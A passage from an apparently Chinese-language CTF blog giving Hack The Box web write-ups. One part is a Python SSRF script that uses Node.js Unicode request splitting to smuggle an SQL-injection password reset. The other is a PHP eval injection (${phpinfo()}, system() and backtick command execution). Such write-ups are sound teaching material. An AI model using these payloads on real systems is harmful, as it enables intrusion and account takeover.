class="hljs-string">        );</span><br><span class="hljs-string"></span><br><span class="hljs-string">        INSERT INTO users (username, password) VALUES (&#x27;admin&#x27;, &#x27;<span class="hljs-subst">$&#123; crypto.randomBytes(<span class="hljs-number">32</span>).toString(<span class="hljs-string">&#x27;hex&#x27;</span>) &#125;</span>&#x27;);</span><br><span class="hljs-string">    `</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>&#x2F;api&#x2F;waether，这个路由中，<code>let &#123; endpoint, city, country &#125; = req.body;</code>将POST请求的参数赋给<code>&#123; endpoint, city, country &#125;</code>，调用WeatherHelper中的<code>getWeather()</code>方法，参数为res, endpoint, city, country</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs js">router.<span class="hljs-title function_">post</span>(<span class="hljs-string">&#x27;/api/weather&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> &#123;<br>	<span class="hljs-keyword">let</span> &#123; endpoint, city, country &#125; = req.<span class="hljs-property">body</span>;<br><br>	<span class="hljs-keyword">if</span> (endpoint &amp;&amp; city &amp;&amp; country) &#123;<br>		<span class="hljs-keyword">return</span> <span class="hljs-title class_">WeatherHelper</span>.<span class="hljs-title function_">getWeather</span>(res, endpoint, city, country);<br>	&#125;<br><br>	<span class="hljs-keyword">return</span> res.<span class="hljs-title function_">send</span>(<span class="hljs-title function_">response</span>(<span class="hljs-string">&#x27;Missing parameters&#x27;</span>));<br>&#125;);	<br></code></pre></td></tr></table></figure>

<p>，那就顺着思路往下看WeatherHelper.js，就是请求一个api然后返回城市数据气温等等信息：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">const</span> <span class="hljs-title class_">HttpHelper</span> = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;../helpers/HttpHelper&#x27;</span>);<br><br><span class="hljs-variable language_">module</span>.<span class="hljs-property">exports</span> = &#123;<br>    <span class="hljs-keyword">async</span> <span class="hljs-title function_">getWeather</span>(<span class="hljs-params">res, endpoint, city, country</span>) &#123;<br><br>        <span class="hljs-comment">// *.openweathermap.org is out of scope</span><br>        <span class="hljs-keyword">let</span> apiKey = <span class="hljs-string">&#x27;10a62430af617a949055a46fa6dec32f&#x27;</span>;<br>        <span class="hljs-keyword">let</span> weatherData = <span class="hljs-keyword">await</span> <span class="hljs-title class_">HttpHelper</span>.<span class="hljs-title class_">HttpGet</span>(<span class="hljs-string">`http://<span class="hljs-subst">$&#123;endpoint&#125;</span>/data/2.5/weather?q=<span class="hljs-subst">$&#123;city&#125;</span>,<span class="hljs-subst">$&#123;country&#125;</span>&amp;units=metric&amp;appid=<span class="hljs-subst">$&#123;apiKey&#125;</span>`</span>); <br>        <br>        <span class="hljs-keyword">if</span> (weatherData.<span class="hljs-property">name</span>) &#123;<br>            <span class="hljs-keyword">let</span> weatherDescription = weatherData.<span class="hljs-property">weather</span>[<span class="hljs-number">0</span>].<span class="hljs-property">description</span>;<br>            <span class="hljs-keyword">let</span> weatherIcon = weatherData.<span class="hljs-property">weather</span>[<span class="hljs-number">0</span>].<span class="hljs-property">icon</span>.<span class="hljs-title function_">slice</span>(<span class="hljs-number">0</span>, -<span class="hljs-number">1</span>);<br>            <span class="hljs-keyword">let</span> weatherTemp = weatherData.<span class="hljs-property">main</span>.<span class="hljs-property">temp</span>;<br><br>            <span class="hljs-keyword">switch</span> (<span class="hljs-built_in">parseInt</span>(weatherIcon)) &#123;<br>                <span class="hljs-keyword">case</span> <span class="hljs-number">2</span>: <span class="hljs-keyword">case</span> <span class="hljs-number">3</span>: <span class="hljs-keyword">case</span> <span class="hljs-number">4</span>:<br>                    weatherIcon = <span class="hljs-string">&#x27;icon-clouds&#x27;</span>;<br>                    <span class="hljs-keyword">break</span>;<br>                <span class="hljs-keyword">case</span> <span class="hljs-number">9</span>: <span class="hljs-keyword">case</span> <span class="hljs-number">10</span>:<br>                    weatherIcon = <span class="hljs-string">&#x27;icon-rain&#x27;</span>;<br>                    <span class="hljs-keyword">break</span>;<br>                <span class="hljs-keyword">case</span> <span class="hljs-number">11</span>:<br>                    weatherIcon = <span class="hljs-string">&#x27;icon-storm&#x27;</span>;<br>                    <span class="hljs-keyword">break</span>;<br>                <span class="hljs-keyword">case</span> <span class="hljs-number">13</span>:<br>                    weatherIcon = <span class="hljs-string">&#x27;icon-snow&#x27;</span>;<br>                    <span class="hljs-keyword">break</span>;<br>                <span class="hljs-attr">default</span>:<br>                    weatherIcon = <span class="hljs-string">&#x27;icon-sun&#x27;</span>;<br>                    <span class="hljs-keyword">break</span>;<br>            &#125;<br><br>            <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">send</span>(&#123;<br>                <span class="hljs-attr">desc</span>: weatherDescription,<br>                <span class="hljs-attr">icon</span>: weatherIcon,<br>                <span class="hljs-attr">temp</span>: weatherTemp,<br>            &#125;);<br>        &#125; <br><br>        <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">send</span>(&#123;<br>            <span class="hljs-attr">error</span>: <span class="hljs-string">`Could not find <span class="hljs-subst">$&#123;city&#125;</span> or <span class="hljs-subst">$&#123;country&#125;</span>`</span><br>        &#125;);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>其中的<code>HttpHelper.HttpGet()</code>方法是访问一个api并接受处理返回的数据，以json返回，重点在于，<strong>这里是通过服务端进行一次get请求的</strong>，并且endpoint等参数在前面看到过，是可控的</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">const</span> http = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;http&#x27;</span>);<br><br><span class="hljs-variable language_">module</span>.<span class="hljs-property">exports</span> = &#123;<br>	<span class="hljs-title class_">HttpGet</span>(url) &#123;<br>		<span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Promise</span>(<span class="hljs-function">(<span class="hljs-params">resolve, reject</span>) =&gt;</span> &#123;<br>			http.<span class="hljs-title function_">get</span>(url, <span class="hljs-function"><span class="hljs-params">res</span> =&gt;</span> &#123;<br>				<span class="hljs-keyword">let</span> body = <span class="hljs-string">&#x27;&#x27;</span>;<br>				res.<span class="hljs-title function_">on</span>(<span class="hljs-string">&#x27;data&#x27;</span>, <span class="hljs-function"><span class="hljs-params">chunk</span> =&gt;</span> body += chunk);<br>				res.<span class="hljs-title function_">on</span>(<span class="hljs-string">&#x27;end&#x27;</span>, <span class="hljs-function">() =&gt;</span> &#123;<br>					<span class="hljs-keyword">try</span> &#123;<br>						<span class="hljs-title function_">resolve</span>(<span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">parse</span>(body));<br>					&#125; <span class="hljs-keyword">catch</span>(e) &#123;<br>						<span class="hljs-title function_">resolve</span>(<span class="hljs-literal">false</span>);<br>					&#125;<br>				&#125;);<br>			&#125;).<span class="hljs-title function_">on</span>(<span class="hljs-string">&#x27;error&#x27;</span>, reject);<br>		&#125;);<br>	&#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>全部代码看了一遍下来还是不知道ssrf的点在哪里，改过XFF为127.0.0.1也不行。无奈去看了点提示，发现package.json的内容我都没看过，wp看到注意nodejs的版本，是8.12.0，于是去谷歌开始search相关版本的漏洞，重点注意ssrf的，</p>
<p><img src="/2023/08/03/HTB-note/image-20230813011757769.png" srcset="/img/loading.gif" lazyload></p>
<p>找了很久也是一路顺藤摸瓜找到了这篇文章：<a target="_blank" rel="noopener" href="https://www.rfk.id.au/blog/entry/security-bugs-ssrf-via-request-splitting/">文章</a>，是关于nodejs的请求分割，CRLF(HTTP响应拆分攻击)</p>
<p>简单理解就是node在实际发起请求前，对url的处理是使用多字节的unicode编码解析，如果传入数据中包含恶意设计的unicode编码，在解析之后就会变为字符(如\r\n)，就会造成请求分割。</p>
<p><img src="/2023/08/03/HTB-note/image-20230813025846341.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs taggerscript">将空格编码为<span class="hljs-symbol">\u0120</span><br>\r编码为<span class="hljs-symbol">\u010D</span><br><span class="hljs-symbol">\n</span>编码为<span class="hljs-symbol">\u010A</span><br>引号等其余字符url编码<br></code></pre></td></tr></table></figure>

<p>脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> urllib.parse<br><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&#x27;http://157.245.39.76:31090/api/weather&#x27;</span><br><br>username = <span class="hljs-string">&#x27;admin&#x27;</span><br>password = <span class="hljs-string">&quot;&#x27;) on conflict(username) do update set password = &#x27;11&#x27;;--&quot;</span><br>username = urllib.parse.quote(username)<br>password = urllib.parse.quote(password)<br><span class="hljs-comment">#print(username)</span><br><span class="hljs-comment">#print(password)</span><br><br>content_length = <span class="hljs-built_in">len</span>(<span class="hljs-string">f&quot;username=<span class="hljs-subst">&#123;username&#125;</span>&amp;password=<span class="hljs-subst">&#123;password&#125;</span>&quot;</span>)<br><br>payload = \<br><span class="hljs-string">f&quot;&quot;&quot;127.0.0.1/ HTTP/1.1</span><br><span class="hljs-string">Host: 127.0.0.1</span><br><span class="hljs-string"></span><br><span class="hljs-string">POST /register HTTP/1.1</span><br><span class="hljs-string">Host: 127.0.0.1</span><br><span class="hljs-string">Content-Type: application/x-www-form-urlencoded</span><br><span class="hljs-string">Content-Length: <span class="hljs-subst">&#123;content_length&#125;</span></span><br><span class="hljs-string">Connection: close</span><br><span class="hljs-string"></span><br><span class="hljs-string">username=<span class="hljs-subst">&#123;username&#125;</span>&amp;password=<span class="hljs-subst">&#123;password&#125;</span></span><br><span class="hljs-string"></span><br><span class="hljs-string">GET /&quot;&quot;&quot;</span><span class="hljs-comment">#此处用于闭合HttpHelper.HttpGet()传入endpoint后面的部分</span><br><br>endpoint = payload.replace(<span class="hljs-string">&#x27; &#x27;</span>,<span class="hljs-string">&#x27;\u0120&#x27;</span>).replace(<span class="hljs-string">&#x27;\n&#x27;</span>,<span class="hljs-string">&#x27;\u010A&#x27;</span>).replace(<span class="hljs-string">&#x27;\r&#x27;</span>,<span class="hljs-string">&#x27;\u010D&#x27;</span>)<br>city = <span class="hljs-string">&#x27;city&#x27;</span><br>country = <span class="hljs-string">&#x27;cn&#x27;</span><br><span class="hljs-comment">#print(endpoint)</span><br><br>r = requests.post(url,json=&#123;<span class="hljs-string">&#x27;endpoint&#x27;</span>:endpoint,<span class="hljs-string">&#x27;city&#x27;</span>:city,<span class="hljs-string">&#x27;country&#x27;</span>:country&#125;).status_code<br><span class="hljs-built_in">print</span>(r)<br></code></pre></td></tr></table></figure>

<p>这里要讲一下SQLite中的ON CONFLICT语句，在SQLite数据库中，”ON CONFLICT” 是一种用于处理插入操作中发生冲突的机制。当尝试向表中插入一行数据时，如果违反了某些约束（例如唯一性约束），就会发生冲突。”ON CONFLICT” 子句允许你指定在发生冲突时应该如何处理。</p>
<p>常见的用法是在 INSERT 语句中使用 “ON CONFLICT” 子句。以下是一些示例：</p>
<p>忽略冲突：INSERT OR IGNORE INTO table_name … 会忽略冲突并继续执行。</p>
<p>替换（Replace）：INSERT OR REPLACE INTO table_name … 会尝试插入数据，如果发生冲突，会先删除原有数据然后插入新数据。</p>
<p>更新（Update）：INSERT OR REPLACE INTO table_name … 会尝试插入数据，如果发生冲突，会更新冲突行的数据。</p>
<p>回滚（Rollback）：INSERT OR ROLLBACK INTO table_name … 在发生冲突时会回滚整个事务，不会插入数据。</p>
<p>这里利用的是on confilct update</p>
<p>使用密码11登录</p>
<p><img src="/2023/08/03/HTB-note/image-20230814024906415.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="LoveTok"><a href="#LoveTok" class="headerlink" title="LoveTok"></a>LoveTok</h3><p>页面如下：</p>
<p><img src="/2023/08/03/HTB-note/image-20230817113913113.png" srcset="/img/loading.gif" lazyload></p>
<p>查看源代码：</p>
<p>TimeControllor.php：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">TimeController</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">index</span>(<span class="hljs-params"><span class="hljs-variable">$router</span></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-variable">$format</span> = <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;format&#x27;</span>]) ? <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;format&#x27;</span>] : <span class="hljs-string">&#x27;r&#x27;</span>;<br>        <span class="hljs-variable">$time</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">TimeModel</span>(<span class="hljs-variable">$format</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-variable">$router</span>-&gt;<span class="hljs-title function_ invoke__">view</span>(<span class="hljs-string">&#x27;index&#x27;</span>, [<span class="hljs-string">&#x27;time&#x27;</span> =&gt; <span class="hljs-variable">$time</span>-&gt;<span class="hljs-title function_ invoke__">getTime</span>()]);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>定义了一个TimeController类，类里定义了一个index()方法，其中format变量通过GET请求传入，否则默认为r，然后实例化一个TimeModel类，传入format参数，再返回一个路由渲染，渲染time值为time类中的getTime()方法，</p>
<p>TimeModel.php：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">TimeModel</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$format</span></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;format = <span class="hljs-title function_ invoke__">addslashes</span>(<span class="hljs-variable">$format</span>);<br><br>        [ <span class="hljs-variable">$d</span>, <span class="hljs-variable">$h</span>, <span class="hljs-variable">$m</span>, <span class="hljs-variable">$s</span> ] = [ <span class="hljs-title function_ invoke__">rand</span>(<span class="hljs-number">1</span>, <span class="hljs-number">6</span>), <span class="hljs-title function_ invoke__">rand</span>(<span class="hljs-number">1</span>, <span class="hljs-number">23</span>), <span class="hljs-title function_ invoke__">rand</span>(<span class="hljs-number">1</span>, <span class="hljs-number">59</span>), <span class="hljs-title function_ invoke__">rand</span>(<span class="hljs-number">1</span>, <span class="hljs-number">69</span>) ];<br>        <span class="hljs-variable language_">$this</span>-&gt;prediction = <span class="hljs-string">&quot;+$&#123;d&#125; day +$&#123;h&#125; hour +$&#123;m&#125; minute +$&#123;s&#125; second&quot;</span>;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getTime</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">eval</span>(<span class="hljs-string">&#x27;$time = date(&quot;&#x27;</span> . <span class="hljs-variable language_">$this</span>-&gt;format . <span class="hljs-string">&#x27;&quot;, strtotime(&quot;&#x27;</span> . <span class="hljs-variable language_">$this</span>-&gt;prediction . <span class="hljs-string">&#x27;&quot;));&#x27;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$time</span>) ? <span class="hljs-variable">$time</span> : <span class="hljs-string">&#x27;Something went terribly wrong&#x27;</span>;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>定义了一个TimeModel类，类里定义了一个构造函数和一个getTime函数，构造函数参数为format，然后addslashes转义掉单双引号，再随机生成一个日期时间，然后组成一个时间的字符串；<code>getTime()</code>方法中有一个eval ()函数，用于格式化日期时间，最后返回时间。</p>
<p>那这里的eval函数就存在可能的rce，这里有一个前置知识，在date函数中使用一个与时间无关的任意字符串作为format参数</p>
<p>，函数会将这个字符串原样输出，而不会进行日期和时间格式化，于是这里传入${phpinfo()}，存在rce</p>
<p><img src="/2023/08/03/HTB-note/image-20230817211657568.png" srcset="/img/loading.gif" lazyload></p>
<p>那就用system()函数执行命令吧，然后问题就来了，题目把引号转义了，不过不同的题目思想都是类似可以相互借鉴的，ssti那边将引号ban了之后采用的是将字符串用GET或者POST传参或者放入header或cookie里，这里就把命令放入GET参数中：</p>
<p><img src="/2023/08/03/HTB-note/image-20230817212614498.png" srcset="/img/loading.gif" lazyload></p>
<p>这里还想出来另外一种方法，既然无法使用引号包装shell字符串，那就不用呗，用反引号也能执行系统命令，但是无法输出结果，这时候我们只需要使用输出语句print_r()或echo或var_dump()将结果输出即可，这里echo不知道为什么500了，print_r()和var_dump()可以完美实现：</p>
<p><img src="/2023/08/03/HTB-note/image-20230817213307862.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/2023/08/03/HTB-note/image-20230817213338865.png" srcset="/img/loading.gif" lazyload></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Web/">#Web</a>
      
        <a href="/tags/%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F/">#正则表达式</a>
      
    </div>
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/08/09/Litctf2023/" title="Litctf2023">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Litctf2023</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/08/02/star-ctf/" title="star_ctf">
                        <span class="hidden-mobile">star_ctf</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://potatowo233.github.io/" target="_blank" rel="nofollow noopener"><span>Potat0w0</span></a> <i class="iconfont icon-love"></i>

    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  
<script src="/js/click.js"></script>
<script src="/js/snow.js"></script>
<script src="/js/potato.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
